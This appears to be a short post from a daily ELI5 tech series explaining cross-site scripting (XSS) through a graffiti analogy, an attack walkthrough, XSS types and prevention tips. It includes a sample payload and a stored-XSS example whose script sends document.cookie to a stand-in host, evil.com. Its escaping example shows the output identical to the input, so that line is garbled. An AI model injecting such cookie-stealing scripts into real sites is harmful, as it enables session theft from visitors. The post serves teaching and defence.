Injecting malicious scripts into websites
Day 88 of 149
👉 Full deep-dive with code examples
The Graffiti Analogy
Imagine someone spray-painting a message on a public bulletin board.
Many people who read the board see the message as if it were official.
XSS is digital graffiti on websites!
How XSS Works
1. Attacker finds input that displays on page (comments)
2. Instead of normal comment, they submit:
<script>steal(document.cookie)</script>
3. Website displays it without checking
4. Victim visits page → their browser runs attacker's code!
5. Code steals cookies, redirects, etc.
Real Example
<!-- Vulnerable comment section -->
<div class="comment">Nice post!</div>
<div class="comment">
<script>
fetch("https://evil.com/steal?cookie=" + document.cookie);
</script>
</div>
When you view this page, YOUR cookies get stolen!
Types of XSS
| Type | Where Code Lives |
|---|---|
| Stored | In database (persists) |
| Reflected | In URL (one-time) |
| DOM-based | In JavaScript (client-side) |
Prevention
// Avoid inserting user input directly!
// Escape special characters:
"<script>" → "<script>"
Also use: Content Security Policy, HttpOnly cookies
In One Sentence
XSS attacks inject malicious JavaScript into websites that runs in other users' browsers.
🔗 Enjoying these? Follow for daily ELI5 explanations!
Making complex tech concepts simple, one day at a time.
Top comments (0)